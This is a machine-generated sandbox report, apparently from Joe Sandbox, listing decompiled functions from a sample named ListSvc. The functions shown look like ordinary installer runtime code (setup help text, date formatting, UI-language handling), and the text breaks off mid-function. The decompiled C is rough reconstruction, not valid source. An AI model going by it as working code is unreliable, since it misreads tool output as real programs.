Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: 098dc979d013d57468a629589b458cb88fc05e19e5f0a5a7df6b54d31b1502c0
Instruction ID: 2fed5c09d90993a71d142947efe00684c7910c2ed580f9cb9a97fb5731140b2d
Opcode Fuzzy Hash: 098dc979d013d57468a629589b458cb88fc05e19e5f0a5a7df6b54d31b1502c0
Instruction Fuzzy Hash: 4B51EE75A012299FCB21DB59D981BDAB3FCAF0C304F8041DAF548E7211D634AF858F65

Uniqueness

Uniqueness Score: -1.00%

Function 004AFA44, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 44
windowCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E004AFA44(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void* _t24;
				intOrPtr _t28;
				void* _t31;
				void* _t32;
				intOrPtr _t35;

				_t32 = __esi;
				_t31 = __edi;
				_push(0);
				_push(0);
				_t24 = __eax;
				_push(_t35);
				_push(0x4aface);
				_push( *[fs:eax]);
				 *[fs:eax] = _t35;
				if(( *0x4c1d61 & 0x00000001) == 0) {
					E00407A20( &_v8);
				} else {
					E00407E48( &_v8, L"/ALLUSERS\r\nInstructs Setup to install in administrative install mode.\r\n/CURRENTUSER\r\nInstructs Setup to install in non administrative install mode.\r\n");
				}
				_push(L"The Setup program accepts optional command line parameters.\r\n\r\n/HELP, /?\r\nShows this information.\r\n/SP-\r\nDisables the This will install... Do you wish to continue? prompt at the beginning of Setup.\r\n/SILENT, /VERYSILENT\r\nInstructs Setup to be silent or very silent.\r\n/SUPPRESSMSGBOXES\r\nInstructs Setup to suppress message boxes.\r\n/LOG\r\nCauses Setup to create a log file in the user\'s TEMP directory.\r\n/LOG=\"filename\"\r\nSame as /LOG, except it allows you to specify a fixed path/filename to use for the log file.\r\n/NOCANCEL\r\nPrevents the user from cancelling during the installation process.\r\n/NORESTART\r\nPrevents Setup from restarting the system following a successful installation, or after a Preparing to Install failure that requests a restart.\r\n/RESTARTEXITCODE=exit code\r\nSpecifies a custom exit code that Setup is to return when the system needs to be restarted.\r\n/CLOSEAPPLICATIONS\r\nInstructs Setup to close applications using files that need to be updated.\r\n/NOCLOSEAPPLICATIONS\r\nPrevents Setup from closing applications using files that need to be updated.\r\n/FORCECLOSEAPPLICATIONS\r\nInstructs Setup to force close when closing applications.\r\n/FORCENOCLOSEAPPLICATIONS\r\nPrevents Setup from force closing when closing applications.\r\n/LOGCLOSEAPPLICATIONS\r\nInstructs Setup to create extra logging when closing applications for debugging purposes.\r\n/RESTARTAPPLICATIONS\r\nInstructs Setup to restart applications.\r\n/NORESTARTAPPLICATIONS\r\nPrevents Setup from restarting applications.\r\n/LOADINF=\"filename\"\r\nInstructs Setup to load the settings from the specified file after having checked the command line.\r\n/SAVEINF=\"filename\"\r\nInstructs Setup to save installation settings to the specified file.\r\n/LANG=language\r\nSpecifies the internal name of the language to use.\r\n/DIR=\"x:\\dirname\"\r\nOverrides the default directory name.\r\n/GROUP=\"folder name\"\r\nOverrides the default folder name.\r\n/NOICONS\r\nInstructs Setup to initially check the Don\'t create a Start Menu folder check box.\r\n/TYPE=type name\r\nOverrides the default setup type.\r\n/COMPONENTS=\"comma separated list of component names\"\r\nOverrides the default component settings.\r\n/TASKS=\"comma separated list of task names\"\r\nSpecifies a list of tasks that should be initially selected.\r\n/MERGETASKS=\"comma separated list of task names\"\r\nLike the /TASKS parameter, except the specified tasks will be merged with the set of tasks that would have otherwise been selected by default.\r\n/PASSWORD=password\r\nSpecifies the password to use.\r\n");
				_push(_v8);
				_push(_t24);
				_push(0x4b0f94);
				_push(L"For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline");
				E004087C4( &_v12, _t24, 5, _t31, _t32);
				MessageBoxW(0, E004084EC(_v12), L"Setup", 0x10);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E004AFAD5);
				return E00407A80( &_v12, 2);
			}

0x004afa44
0x004afa44
0x004afa47
0x004afa49
0x004afa4c
0x004afa50
0x004afa51
0x004afa56
0x004afa59
0x004afa63
0x004afa77
0x004afa65
0x004afa6d
0x004afa6d
0x004afa7c
0x004afa81
0x004afa84
0x004afa85
0x004afa8a
0x004afa97
0x004afaae
0x004afab5
0x004afab8
0x004afabb
0x004afacd

APIs

MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 004AFAAE

Strings

The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in, xrefs: 004AFA7C
For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline, xrefs: 004AFA8A
/ALLUSERSInstructs Setup to install in administrative install mode./CURRENTUSERInstructs Setup to install in non administrat, xrefs: 004AFA68
Setup, xrefs: 004AFA9E

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: Message
String ID: /ALLUSERSInstructs Setup to install in administrative install mode./CURRENTUSERInstructs Setup to install in non administrat$For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline$Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in
API String ID: 2030045667-3391638011
Opcode ID: 66245cf56300a1c7c541050b9d52e7f7cee767bf73c9c42da64b4bca2bf40a85
Instruction ID: 307a18092975e57fce7d36cb0845ad1ef4e0a75d88e156d2955b45763d379f25
Opcode Fuzzy Hash: 66245cf56300a1c7c541050b9d52e7f7cee767bf73c9c42da64b4bca2bf40a85
Instruction Fuzzy Hash: D701A230748308BBE711E7D1CD52FDEB6A8D74AB04FA0047BB904B25D1D6BC6A09852D

Uniqueness

Uniqueness Score: -1.00%

Function 0042F9B8, Relevance: 7.8, APIs: 5, Instructions: 335
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0042F9B8(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
				signed int _v8;
				signed char _v9;
				signed int _v12;
				signed int _v14;
				void* _v20;
				void* _v24;
				signed short* _v28;
				signed short* _v32;
				signed int _v48;
				void* __ebx;
				void* __ebp;
				signed int _t150;
				signed int _t272;
				intOrPtr _t328;
				intOrPtr _t331;
				intOrPtr _t339;
				intOrPtr _t347;
				intOrPtr _t355;
				void* _t360;
				void* _t362;
				intOrPtr _t363;

				_t367 = __fp0;
				_t358 = __edi;
				_t360 = _t362;
				_t363 = _t362 + 0xffffffd4;
				_v8 = __ecx;
				_v32 = __edx;
				_v28 = __eax;
				_v9 = 1;
				_t272 =  *_v28 & 0x0000ffff;
				if((_t272 & 0x00000fff) >= 0x10f) {
					_t150 =  *_v32 & 0x0000ffff;
					if(_t150 != 0) {
						if(_t150 != 1) {
							if(E00430860(_t272,  &_v20) != 0) {
								_push( &_v14);
								_t273 =  *_v20;
								if( *((intOrPtr*)( *_v20 + 8))() == 0) {
									_t275 =  *_v32 & 0x0000ffff;
									if(( *_v32 & 0xfff) >= 0x10f) {
										if(E00430860(_t275,  &_v24) != 0) {
											_push( &_v12);
											_t276 =  *_v24;
											if( *((intOrPtr*)( *_v24 + 4))() == 0) {
												E00428BF0(0xb);
												goto L41;
											} else {
												if(( *_v28 & 0x0000ffff) == _v12) {
													_t143 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
													_v9 =  *(0x4b93d2 + _v8 * 2 + _t143) & 0x000000ff;
													goto L41;
												} else {
													_push( &_v48);
													L00427244();
													_push(_t360);
													_push(0x42fdb0);
													_push( *[fs:eax]);
													 *[fs:eax] = _t363;
													_t289 = _v12 & 0x0000ffff;
													E004299A4( &_v48, _t276, _v12 & 0x0000ffff, _v28, __edi, __fp0);
													if((_v48 & 0x0000ffff) != _v12) {
														E00428AF8(_t289);
													}
													_t131 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
													_v9 =  *(0x4b93d2 + _v8 * 2 + _t131) & 0x000000ff;
													_pop(_t328);
													 *[fs:eax] = _t328;
													_push(0x42fde5);
													return E00429278( &_v48);
												}
											}
										} else {
											E00428BF0(0xb);
											goto L41;
										}
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42fcf7);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t294 =  *_v32 & 0x0000ffff;
										E004299A4( &_v48, _t275,  *_v32 & 0x0000ffff, _v28, __edi, __fp0);
										if(( *_v32 & 0x0000ffff) != _v48) {
											E00428AF8(_t294);
										}
										_v9 = E0042F7D0( &_v48, _v8, _v32, _t358, _t360, _t367);
										_pop(_t331);
										 *[fs:eax] = _t331;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								} else {
									if(( *_v32 & 0x0000ffff) == _v14) {
										_t95 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t95) & 0x000000ff;
										goto L41;
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42fc52);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t299 = _v14 & 0x0000ffff;
										E004299A4( &_v48, _t273, _v14 & 0x0000ffff, _v32, __edi, __fp0);
										if((_v48 & 0x0000ffff) != _v14) {
											E00428AF8(_t299);
										}
										_t83 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t83) & 0x000000ff;
										_pop(_t339);
										 *[fs:eax] = _t339;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								}
							} else {
								E00428BF0(__ecx);
								goto L41;
							}
						} else {
							_v9 = E0042F550(_v8, 2);
							goto L41;
						}
					} else {
						_v9 = E0042F53C(0, 1);
						goto L41;
					}
				} else {
					if(_t272 != 0) {
						if(_t272 != 1) {
							if(E00430860( *_v32 & 0x0000ffff,  &_v24) != 0) {
								_push( &_v12);
								_t282 =  *_v24;
								if( *((intOrPtr*)( *_v24 + 4))() == 0) {
									_push( &_v48);
									L00427244();
									_push(_t360);
									_push(0x42fb63);
									_push( *[fs:eax]);
									 *[fs:eax] = _t363;
									_t306 =  *_v28 & 0x0000ffff;
									E004299A4( &_v48, _t282,  *_v28 & 0x0000ffff, _v32, __edi, __fp0);
									if((_v48 & 0xfff) !=  *_v28) {
										E00428AF8(_t306);
									}
									_v9 = E0042F7D0(_v28, _v8,  &_v48, _t358, _t360, _t367);
									_pop(_t347);
									 *[fs:eax] = _t347;
									_push(0x42fde5);
									return E00429278( &_v48);
								} else {
									if(( *_v28 & 0x0000ffff) == _v12) {
										_t44 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t44) & 0x000000ff;
										goto L41;
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42facc);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t311 = _v12 & 0x0000ffff;
										E004299A4( &_v48, _t282, _v12 & 0x0000ffff, _v28, __edi, __fp0);
										if((_v48 & 0xfff) != _v12) {
											E00428AF8(_t311);
										}
										_t32 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t32) & 0x000000ff;
										_pop(_t355);
										 *[fs:eax] = _t355;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								}
							} else {
								E00428BF0(__ecx);
								goto L41;
							}
						} else {
							_v9 = E0042F550(_v8, 0);
							goto L41;
						}
					} else {
						_v9 = E0042F53C(1, 0);
						L41:
						return _v9 & 0x000000ff;
					}
				}
			}

0x0042f9b8
0x0042f9b8
0x0042f9b9
0x0042f9bb
0x0042f9bf
0x0042f9c2
0x0042f9c5
0x0042f9c8
0x0042f9cf
0x0042f9dc
0x0042fb6d
0x0042fb73
0x0042fb8a
0x0042fbac
0x0042fbbb
0x0042fbc7
0x0042fbce
0x0042fc88
0x0042fc95
0x0042fd0a
0x0042fd19
0x0042fd25
0x0042fd2c
0x0042fde0
0x00000000
0x0042fd32
0x0042fd3c
0x0042fdd6
0x0042fddb
0x00000000
0x0042fd3e
0x0042fd41
0x0042fd42
0x0042fd49
0x0042fd4a
0x0042fd4f
0x0042fd52
0x0042fd55
0x0042fd5f
0x0042fd6c
0x0042fd6e
0x0042fd6e
0x0042fd92
0x0042fd97
0x0042fd9c
0x0042fd9f
0x0042fda2
0x0042fdaf
0x0042fdaf
0x0042fd3c
0x0042fd0c
0x0042fd0c
0x00000000
0x0042fd0c
0x0042fc97
0x0042fc9a
0x0042fc9b
0x0042fca2
0x0042fca3
0x0042fca8
0x0042fcab
0x0042fcb1
0x0042fcba
0x0042fcc9
0x0042fccb
0x0042fccb
0x0042fcde
0x0042fce3
0x0042fce6
0x0042fce9
0x0042fcf6
0x0042fcf6
0x0042fbd4
0x0042fbde
0x0042fc78
0x0042fc7d
0x00000000
0x0042fbe0
0x0042fbe3
0x0042fbe4
0x0042fbeb
0x0042fbec
0x0042fbf1
0x0042fbf4
0x0042fbf7
0x0042fc01
0x0042fc0e
0x0042fc10
0x0042fc10
0x0042fc34
0x0042fc39
0x0042fc3e
0x0042fc41
0x0042fc44
0x0042fc51
0x0042fc51
0x0042fbde
0x0042fbae
0x0042fbae
0x00000000
0x0042fbae
0x0042fb8c
0x0042fb98
0x00000000
0x0042fb98
0x0042fb75
0x0042fb7e
0x00000000
0x0042fb7e
0x0042f9e2
0x0042f9e5
0x0042f9fc
0x0042fa22
0x0042fa31
0x0042fa3d
0x0042fa44
0x0042fb02
0x0042fb03
0x0042fb0a
0x0042fb0b
0x0042fb10
0x0042fb13
0x0042fb19
0x0042fb22
0x0042fb35
0x0042fb37
0x0042fb37
0x0042fb4a
0x0042fb4f
0x0042fb52
0x0042fb55
0x0042fb62
0x0042fa4a
0x0042fa54
0x0042faf2
0x0042faf7
0x00000000
0x0042fa56
0x0042fa59
0x0042fa5a
0x0042fa61
0x0042fa62
0x0042fa67
0x0042fa6a
0x0042fa6d
0x0042fa77
0x0042fa88
0x0042fa8a
0x0042fa8a
0x0042faae
0x0042fab3
0x0042fab8
0x0042fabb
0x0042fabe
0x0042facb
0x0042facb
0x0042fa54
0x0042fa24
0x0042fa24
0x00000000
0x0042fa24
0x0042f9fe
0x0042fa0a
0x00000000
0x0042fa0a
0x0042f9e7
0x0042f9f0
0x0042fde5
0x0042fded
0x0042fded
0x0042f9e5

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6922fb93c990c72bf9a49bf3daa94017bfe3b7264ddd93f55e738123a9900a9
Instruction ID: 1b6310f250808118d38827de8a535e3b6e70e535f73b2508e71121fbf0c58563
Opcode Fuzzy Hash: c6922fb93c990c72bf9a49bf3daa94017bfe3b7264ddd93f55e738123a9900a9
Instruction Fuzzy Hash: 41D19D75E0011A9FCB00EFA9D4919FEB7B5EF48300BD080B6E801A7245D638AD4ADB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041C790, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77
threadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0041C790(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				short _v536;
				short* _t32;
				intOrPtr* _t47;
				intOrPtr _t56;
				void* _t61;
				intOrPtr _t63;
				void* _t67;

				_v8 = 0;
				_t47 = __edx;
				_t61 = __eax;
				_push(_t67);
				_push(0x41c873);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffdec;
				E00407A20(__edx);
				_v24 =  *(_a4 - 2) & 0x0000ffff;
				_v22 =  *(_a4 - 4) & 0x0000ffff;
				_v18 =  *(_a4 - 6) & 0x0000ffff;
				if(_t61 > 2) {
					E00407E48( &_v8, L"yyyy");
				} else {
					E00407E48( &_v8, 0x41c88c);
				}
				_t32 = E004084EC(_v8);
				if(GetDateFormatW(GetThreadLocale(), 4,  &_v24, _t32,  &_v536, 0x200) != 0) {
					E0040858C(_t47, 0x100,  &_v536);
					if(_t61 == 1 &&  *((short*)( *_t47)) == 0x30) {
						_t63 =  *_t47;
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 - 4));
						}
						E004088AC( *_t47, _t63 - 1, 2, _t47);
					}
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x41c87a);
				return E00407A20( &_v8);
			}

0x0041c79d
0x0041c7a0
0x0041c7a2
0x0041c7a6
0x0041c7a7
0x0041c7ac
0x0041c7af
0x0041c7b4
0x0041c7c0
0x0041c7cb
0x0041c7d6
0x0041c7dd
0x0041c7f6
0x0041c7df
0x0041c7e7
0x0041c7e7
0x0041c80a
0x0041c823
0x0041c832
0x0041c838
0x0041c842
0x0041c846
0x0041c84b
0x0041c84b
0x0041c858
0x0041c858
0x0041c838
0x0041c85f
0x0041c862
0x0041c865
0x0041c872

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C816
GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C81C

Strings

yyyy, xrefs: 0041C7F1
, xrefs: 0041C7E2

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: $yyyy
API String ID: 3303714858-404527807
Opcode ID: 9b84cafd13c5b3a76178dd7a5deb0e6d63fe676c73d736d950a9ec0585647aa0
Instruction ID: d4c72dfe3e93bc103dd676e1b73ac12d517b544291048ec360f079cc1ca068dc
Opcode Fuzzy Hash: 9b84cafd13c5b3a76178dd7a5deb0e6d63fe676c73d736d950a9ec0585647aa0
Instruction Fuzzy Hash: 9A215335A442189BDB11EF95CDC1AAEB3B8EF08701F5144BBFC45E7281D7789E4087AA

Uniqueness

Uniqueness Score: -1.00%

Function 0041EEFC, Relevance: 6.1, APIs: 4, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0041EEFC(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v534;
				short _v1056;
				short _v1568;
				struct _MEMORY_BASIC_INFORMATION _v1596;
				char _v1600;
				intOrPtr _v1604;
				char _v1608;
				intOrPtr _v1612;
				char _v1616;
				intOrPtr _v1620;
				char _v1624;
				char* _v1628;
				char _v1632;
				char _v1636;
				char _v1640;
				intOrPtr _t55;
				signed int _t76;
				void* _t82;
				intOrPtr _t83;
				intOrPtr _t95;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr* _t102;
				void* _t105;

				_v1640 = 0;
				_v8 = __ecx;
				_t82 = __edx;
				_t102 = __eax;
				_push(_t105);
				_push(0x41f0a8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t105 + 0xfffff99c;
				VirtualQuery(__edx,  &_v1596, 0x1c);
				if(_v1596.State != 0x1000 || GetModuleFileNameW(_v1596.AllocationBase,  &_v1056, 0x105) == 0) {
					GetModuleFileNameW( *0x4be634,  &_v1056, 0x105);
					_v12 = E0041EEF0(_t82);
				} else {
					_v12 = _t82 - _v1596.AllocationBase;
				}
				E0041A57C( &_v534, 0x104, E00420608() + 2);
				_t83 = 0x41f0bc;
				_t100 = 0x41f0bc;
				_t95 =  *0x414db8; // 0x414e10
				if(E00405F30(_t102, _t95) != 0) {
					_t83 = E004084EC( *((intOrPtr*)(_t102 + 4)));
					_t76 = E00407F04(_t83);
					if(_t76 != 0 &&  *((short*)(_t83 + _t76 * 2 - 2)) != 0x2e) {
						_t100 = 0x41f0c0;
					}
				}
				_t55 =  *0x4ba774; // 0x40e708
				_t18 = _t55 + 4; // 0xffec
				LoadStringW(E00409FF0( *0x4be634),  *_t18,  &_v1568, 0x100);
				E00405BE8( *_t102,  &_v1640);
				_v1636 = _v1640;
				_v1632 = 0x11;
				_v1628 =  &_v534;
				_v1624 = 0xa;
				_v1620 = _v12;
				_v1616 = 5;
				_v1612 = _t83;
				_v1608 = 0xa;
				_v1604 = _t100;
				_v1600 = 0xa;
				E0041A814(4,  &_v1636);
				E00407F04(_v8);
				_pop(_t98);
				 *[fs:eax] = _t98;
				_push(0x41f0af);
				return E00407A20( &_v1640);
			}

0x0041ef0a
0x0041ef10
0x0041ef13
0x0041ef15
0x0041ef19
0x0041ef1a
0x0041ef1f
0x0041ef22
0x0041ef2f
0x0041ef3e
0x0041ef6e
0x0041ef7a
0x0041ef7f
0x0041ef85
0x0041ef85
0x0041efa7
0x0041efac
0x0041efb1
0x0041efb8
0x0041efc5
0x0041efcf
0x0041efd3
0x0041efda
0x0041efe4
0x0041efe4
0x0041efda
0x0041eff5
0x0041effa
0x0041f009
0x0041f016
0x0041f021
0x0041f027
0x0041f034
0x0041f03a
0x0041f044
0x0041f04a
0x0041f051
0x0041f057
0x0041f05e
0x0041f064
0x0041f080
0x0041f088
0x0041f091
0x0041f094
0x0041f097
0x0041f0a7

APIs

VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53
GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E
LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: b8be0fea34dc80bb7553a8da0885c656d5cafed23f6e23429f91232411ad397e
Instruction ID: 1578eb45e464442e6080653f6025888c356fcaddc808aab3f6789ba0ce71ce89
Opcode Fuzzy Hash: b8be0fea34dc80bb7553a8da0885c656d5cafed23f6e23429f91232411ad397e
Instruction Fuzzy Hash: 3E412374A002589FDB20DF59CC81BCAB7F9AB58304F4044FAE508E7242D7799E95CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6C8, Relevance: 6.1, APIs: 4, Instructions: 95
threadCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040A6C8(signed short __eax, void* __edx) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				short _v22;
				short _v24;
				char _v26;
				char _v32;
				void* __ebp;
				void* _t39;
				void* _t55;
				void* _t59;
				short* _t62;
				signed short _t66;
				void* _t67;
				void* _t68;
				signed short _t79;
				void* _t81;

				_t81 = __edx;
				_t66 = __eax;
				_v16 = 0;
				if(__eax !=  *0x4bdc08()) {
					_v16 = E0040A684( &_v8);
					_t79 = _t66;
					_v20 = 3;
					_t62 =  &_v26;
					do {
						 *_t62 =  *(0xf + "0123456789ABCDEF") & 0x000000ff;
						_t79 = (_t79 & 0x0000ffff) >> 4;
						_v20 = _v20 - 1;
						_t62 = _t62 - 2;
					} while (_v20 != 0xffffffff);
					_v24 = 0;
					_v22 = 0;
					 *0x4bdc04(4,  &_v32,  &_v20);
				}
				_t39 = E0040A684( &_v12);
				_t67 = _t39;
				if(_t67 != 0) {
					_t55 = _v12 - 2;
					if(_t55 >= 0) {
						_t59 = _t55 + 1;
						_v20 = 0;
						do {
							if( *((short*)(_t67 + _v20 * 2)) == 0) {
								 *((short*)(_t67 + _v20 * 2)) = 0x2c;
							}
							_v20 = _v20 + 1;
							_t59 = _t59 - 1;
						} while (_t59 != 0);
					}
					E00408550(_t81, _t67);
					_t39 = E0040540C(_t67);
				}
				if(_v16 != 0) {
					 *0x4bdc04(0, 0,  &_v20);
					_t68 = E0040A684( &_v12);
					if(_v8 != _v12 || E0040A660(_v16, _v12, _t68) != 0) {
						 *0x4bdc04(8, _v16,  &_v20);
					}
					E0040540C(_t68);
					return E0040540C(_v16);
				}
				return _t39;
			}

0x0040a6d0
0x0040a6d2
0x0040a6d6
0x0040a6e2
0x0040a6ec
0x0040a6ef
0x0040a6f1
0x0040a6f8
0x0040a6fb
0x0040a70c
0x0040a712
0x0040a715
0x0040a718
0x0040a71b
0x0040a721
0x0040a727
0x0040a737
0x0040a737
0x0040a740
0x0040a745
0x0040a749
0x0040a74e
0x0040a753
0x0040a755
0x0040a756
0x0040a75d
0x0040a765
0x0040a76a
0x0040a76a
0x0040a770
0x0040a773
0x0040a773
0x0040a75d
0x0040a77a
0x0040a781
0x0040a781
0x0040a78a
0x0040a794
0x0040a7a2
0x0040a7aa
0x0040a7c7
0x0040a7c7
0x0040a7cf
0x00000000
0x0040a7d7
0x0040a7e1

APIs

GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040A6D9
SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040A737
SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040A794
SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040A7C7

Part of subcall function 0040A684: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040A745), ref: 0040A69B
Part of subcall function 0040A684: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040A745), ref: 0040A6B8

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: Thread$LanguagesPreferred$Language
String ID:
API String ID: 2255706666-0
Opcode ID: 4c514f641868e752fd40307e4922e2f5a84495159d338bc2b006041d37f1dfb0
Instruction ID: 64ac70e7ec2a8712ea9b0e83aabe60772fb1db60419ab041f5eb1837937ee239
Opcode Fuzzy Hash: 4c514f641868e752fd40307e4922e2f5a84495159d338bc2b006041d37f1dfb0
Instruction Fuzzy Hash: 97317070E0021A9BDB10DFA9C884AAFB7B8EF04304F00867AE555E7291EB789E05CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00420BD8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00420BD8() {
				void* __ebx;
				struct HINSTANCE__* _t1;
				void* _t4;

				_t1 = GetModuleHandleW(L"kernel32.dll");
				_t3 = _t1;
				if(_t1 != 0) {
					_t1 = E0040E1A8(_t3, _t4, _t3, L"GetDiskFreeSpaceExW");
					 *0x4b7e30 = _t1;
				}
